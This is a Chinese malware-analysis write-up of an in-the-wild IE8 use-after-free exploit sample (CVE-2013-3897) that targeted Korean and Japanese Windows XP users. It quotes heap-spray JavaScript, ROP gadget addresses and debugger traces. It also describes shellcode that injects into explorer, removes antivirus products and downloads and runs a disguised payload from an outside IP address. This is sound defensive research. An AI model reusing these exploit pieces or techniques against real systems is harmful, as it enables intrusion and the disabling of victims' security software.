之前,看到FireEye上的CVE-2013-3893分析,看利用方式比较类似,以为是同一个,分析学习下,发现导致问题的对象不一致,也没有利用ms-help加载office的hxdl构造ROP,后来在BinVul论坛上看到有人发了该样本,才知道是CVE-2013-3897。不正确地方还请扶正。 1. 概述
该样本攻击对象为韩国和日本的WinXP IE8用户,利用了IE8的CDisplayPointer对象的一个Use-After-Free漏洞,利用DEPS HeapSpray技术进行堆喷射,通过msvcrt.dll构造ROP链绕过DEP进行利用。成功利用后,会注入Shellcode到explorer进程,尝试检查结束Kaspersky、AhnLab V3Lite、AhnLab V3 365 Clinic、NaverVaccine、ALYac安全软件,之后从网络服务器上下载执行伪造成GIF的恶意程序。 2. 样本分析
1) 通过DIV元素设置和清除title属性字符串,大量的申请释放大小为0×48的堆空间,激活LFH机制,防止cache分配空间,用0×14141414填充,作为后续vtable jmp var vault=new Array();var str=unescape("% u1414% u1414");while (str.length < 0x50) str=str+str;str=str.substr(0,(0x48-2)/2);for (i=0;i<2000;i++) {vault.push(document.createElement("div"));vault[i].setAttribute("title",str);}for (i=1000;i<2000;i++) vault[i].setAttribute("title",""); CollectGarbage();2) 检查用户电脑环境是否满足: Windows XP + IE8 + 韩国/日本 if(navigator.appName.indexOf("Microsoft Internet Explorer") == -1) {att = 0;}if(navigator.userAgent.indexOf("Windows NT 5.1") == -1) {att = 0;}if(navigator.userAgent.indexOf("MSIE 8.0") == -1) {att = 0;}if(navigator.systemLanguage == navigator.userLanguage) {if(navigator.systemLanguage.indexOf("ko") != -1) {lang = 1;}else if(navigator.systemLanguage.indexOf("ja") != -1) {lang = 1;}3) 如果为韩国日本用户,替换为msvcrt.dll对应的ROP链,然后进行HeapSpray var ate1 = 0x77BD18D3 ;var atz1 = 0x77BCEF5B ; var co1 = 0x77BCF519 ;var pco1 = 0x77BD3E25 ; var jtc1 = 0x77BE746A ; var vPP1 = 0x77BC1120 ;if(lang == 1) { ate = ate1; atz = atz1; co = co1; pco = pco1; jtc = jtc1; vPP = vPP1;3. 漏洞分析
1) 样本本身带了比较多的调试信息, 利用样本已有调试信息,先观察下exp执行的过程 bu jscript!JsAtan2 "j (poi(poi(esp+14)+18) == 0x999) '.printf \"DEBUG: %mu\", poi(poi(poi(esp+14)+8)+8); .echo; g';" 0:008> gDEBUG: before unselectDEBUG: after unselectDEBUG: before selectDEBUG: before swapDEBUG: after swapDEBUG: before unselectDEBUG: after unselect(418.76c): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=14141414 ebx=04c25dbc ecx=030dc200 edx=000000c8 esi=030dc248 edi=80004002eip=77bd18d5 esp=030dc1e4 ebp=030dc218 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246VERSION!VerpQueryValue+0x54:77bd18d5 018d45e0508d add dword ptr [ebp-72AF1FBBh],ecx ss:0023:905ea25d=????????2) 由于不是韩国或日本的windows xp系统,跳转到77bd18d5(本应该msvcrt.dll的)指向的ROP链不正确,触发了异常, 修改跳转地址,重新调试 (8d0.ca0): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=41414141 ebx=0494f48c ecx=030dc200 edx=000000c8 esi=030dc248 edi=80004002eip=6362746c esp=030dc1e8 ebp=030dc218 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246mshtml!QIClassID+0x45:6362746c ff10 call dword ptr [eax ds:0023:41414141=????????0:008> kbChildEBP RetAddr Args to Child030dc218 638cbbf7 0494f48c 3050f4a5 11cf98b5 mshtml!QIClassID+0x45030dc290 638cab07 00195380 0494f48c 00000000 mshtml!CDoc::ScrollPointerIntoView+0xc5030dc2a4 639d115f 0494f470 0020deb8 00000000 mshtml!CDisplayPointer::ScrollIntoView+0x21030dc2c4 639d10bd 030dc354 030dc390 00000002 mshtml!CHTMLEditor::SelectRangeInternal+0x98030dc2dc 639d7416 0020deb8 030dc354 030dc390 mshtml!CHTMLEditor::SelectRange+0x1a3) 此时对象空间已经被DIV的title属性值的str字符串所填充 0:008> dds ebx0494f48c 414141410494f490 414141410494f494 414141410494f498 414141410494f49c 41414141 0:008> !heap -p -a ebxaddress 0494f48c found in_HEAP @ 140000HEAP_ENTRY Size Prev Flags UserPtr UserSize - state0494f468 000c 0000 [07 0494f470 00048 - (busy)Trace: 23a07c98cf9a ntdll!RtlDebugAllocateHeap+0x000000e17c969564 ntdll!RtlAllocateHeapSlowly+0x000000447c938f01 ntdll!RtlAllocateHeap+0x00000e646365173e mshtml!_HeapAllocString+0x00000051 <------ !!!63651871 mshtml!CAttrValue::InitVariant+0x00000154看下问题代码的上下文, 在进行CLSID为_IID_IProxyManager的接口查询时,使用被释放的对象指针触发异常 .text:63627454 and dword ptr [esi], 0.text:63627457 mov eax, [ebx.text:63627459 and [ebp+pInterface], 0.text:6362745D lea ecx, [ebp+pInterface.text:63627460 push ecx.text:63627461 push offset _IID_IProxyManager.text:63627466 push ebx.text:63627467 mov edi, 80004002h.text:6362746C call dword ptr [eax ;....text:638CBBC8 mov [esp+58h+var_38], eax.text:638CBBCC mov eax, [esp+58h+var_18.text:638CBBD0 lea eax, [eax+ecx+2.text:638CBBD4 mov [esp+58h+var_30], eax.text:638CBBD8 lea eax, [esp+58h+local_pI_CMarkupPointer.text:638CBBDC push eax ; void **.text:638CBBDD mov [esp+5Ch+var_34], esi.text:638CBBE1 sub esp, 10h.text:638CBBE4 mov edi, esp.text:638CBBE6 push [ebp+arg_ICMarkupPointer ; struct IUnknown * <---- !!!.text:638CBBE9 mov esi, offset _CLSID_CMarkupPointer.text:638CBBEE movsd.text:638CBBEF movsd.text:638CBBF0 movsd.text:638CBBF1 movsd.text:638CBBF2 call ?QIClassID@@YGJPAUIUnknown@@U_GUID@@PAPAX@Z ; QIClassID(IUnknown *,_GUID,void * *).text:638CBBF7 test eax, eax....text:638CBB50 push eax ; Dst.text:638CBB51 call _memset.text:638CBB56 add esp, 0Ch.text:638CBB59 lea eax, [esp+58h+Dst.text:638CBB5D push eax ; int.text:638CBB5E push [ebp+arg_ZERO ; int.text:638CBB61 push [ebp+arg_ICMarkupPointer ; struct IUnknown * <--- !!!.text:638CBB64 call ?GetLineInfo@CDoc@@QAEJPAUIMarkupPointer@@HPAU_HTMLPtrDispInfoRec@@@Z ; CDoc::GetLineInfo(IMarkupPointer *,int,_HTMLPtrDispInfoRec *).text:638CBB69 lea eax, [ebx+1F0h.text:638CBB6F lea edi, [esp+58h+var_44 ...在 call CDoc::GetLineInfo以及Call QIClassID处下断点 0:008> bl...2 d 638cbb64 0001 (0001) 0:**** mshtml!CDoc::ScrollPointerIntoView+0x323 d 638cbbf2 0001 (0001) 0:**** mshtml!CDoc::ScrollPointerIntoView+0xc04) 在DEBUG信息swap时激活 0:008> be 2,30:008> gDEBUG: after swapeax=030db578 ebx=030db528 ecx=003bb480 edx=633b5f09 esi=049f5518 edi=030db518eip=633b5f09 esp=030db4d8 ebp=030db53c iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246jscript!JsAtan2:633b5f09 8bff mov edi,edi 0:008> gBreakpoint 2 hiteax=030dc264 ebx=001938f0 ecx=00000000 edx=00000000 esi=04b4edd0 edi=04b4ede0eip=638cbb64 esp=030dc22c ebp=030dc290 iopl=0 nv up ei pl nz ac po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212mshtml!CDoc::ScrollPointerIntoView+0x32:638cbb64 e8b9faffff call mshtml!CDoc::GetLineInfo (638cb622)导致问题产生的可能是CDisplayPointer对象,利用代码也表明触发问题的对象在winxp IE8下大小为0×48,与CDisplayPointer一致
此时还没有被释放 0:008> !heap -p -a poi(esp)address 04b2445c found in_HEAP @ 140000HEAP_ENTRY Size Prev Flags UserPtr UserSize - state04b24438 000c 0000 [07 04b24440 00048 - (busy)mshtml!CDisplayPointer::`vftable' <----------Trace: 359e7c98cf9a ntdll!RtlDebugAllocateHeap+0x000000e17c969564 ntdll!RtlAllocateHeapSlowly+0x000000447c938f01 ntdll!RtlAllocateHeap+0x00000e64635f047a mshtml!CDoc::CreateDisplayPointer+0x00000024 <-----------63a07165 mshtml!CSelectTracker::InitPointers+0x00000019635cb78e mshtml!CSelectionManager::SetCurrentTracker+0x00000026639dc0bf mshtml!CSelectionManager::Select+0x00000761639d113a mshtml!CHTMLEditor::SelectRangeInternal+0x00000073639d10bd mshtml!CHTMLEditor::SelectRange+0x0000001a639d7416 mshtml!CHTMLEditorProxy::SelectRange+0x000000256389c886 mshtml!CDoc::Select+0x0000002f4. Shellcode分析
1) 换成日本window xp, 通过在msvcrt上构造ROP,调用VirtualProtect来过DEP 0:008> u 0x77BD18D3msvcrt!type_info::operator==+0x3b:77bd18d3 94 xchg eax,esp77bd18d4 c15e8bc1 rcr dword ptr [esi-75h],0C1h77bd18d8 5d pop ebp77bd18d9 c20400 ret 4...0:008> u 0x77BE746Amsvcrt!_SEH_epilog+0xf:77be746a 51 push ecx ; ecx = ptr kernel32!VirtualProtect77be746b c3 ret ; call kernel32!VirTualProtect然后跳转到1414148c开始执行shellcode,经过一些nop指令后,进行XOR 0×94自解密 141414a9 4a dec edx141414aa 33c9 xor ecx,ecx141414ac 6681c1f30c add cx,0CF3h141414b1 80340a94 xor byte ptr [edx+ecx],94h141414b5 e2fa loop 141414b12) 之后会注入shellcode代码到explore进程 hwnd = User32!FindWindowA(classname: "Progman", windowname:"Program Manager"); <-- explorer.exeGetWindowThreadProcessId(hwnd, &pid_explorer);hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid_explorer);hMem = VirtualAllocEx(hProc, NULL, 4096, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);WriteProcessMemory(hProc, hMem, 14141796, 00000A10, 00000000);CreateRemoteThread(hProc, NULL, 0, 6390000, NULL, 0);kernel32!ExitProcess3) 注入到explore后,首先通过检查是否存在”c:¥Program Files¥Kaspersky Lab”目录(日本操作系统路径显示为¥),来
判断是否安装卡巴斯基,如果不存在继续执行。 4) sleep 10分钟后,杀软检测函数根据参数1-4执行不同杀软的判断结束操作 参数1时,检测是否安装安博士v3杀毒软件,如果安装调用其自身的卸载程序,然后通过获取卸载确定按钮,通过模拟鼠标
点击来进行卸载。 RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE¥¥AhnLab¥¥V3Lite", 0, KEY_READ, pRes)RegQueryValueExA(hKeym "InstallPath", 0, REG_SZ, pData, 255);ShellExecuteA(NULL, "open", "installpath¥Uninst.exe", "Uninstall", 0, 0)hwnd = FindWindowA(NULL, "V3 Lite f")SetWindowPos(hWnd, HWND_BOTTOM, 0, 0, 100, 200, SWP_HIDEWINDOW)FindWindowExA(hParent, hChildAfter, "Button", "f")PostMessageA(hWnd, WM_LBUTTONDOWN, 0, 0)PostMessageA(hWnd, WM_LBUTTONUP, 0, 0)参数2时,检测是否安装AhnLab V3 365 Clinic。参数4时,检测是否安装ESTsoft ALYac。如果安装卸载方式同上 参数3时,检测是否安装NaverVaccine安全软件,如果存在,通过ntsd尝试强制结束对应的进程 WinExec("ntsd -c q -pn NVCAgent.npc", SW_HIDE);WinExec("ntsd -c q -pn Nsavsvc.npc", SW_HIDE)5) 之后,调用URLDownloadToFileA从http://1.234.31.154/mii/fird.gif下载文件保存到临时目录为main001.gif,如果main001.gif
满足大于1KB小于500KB,则会调用WinExec隐藏执行。 6) 恶意程序分析时URL已经失效,没有分析,该处有对该恶意文件的分析 |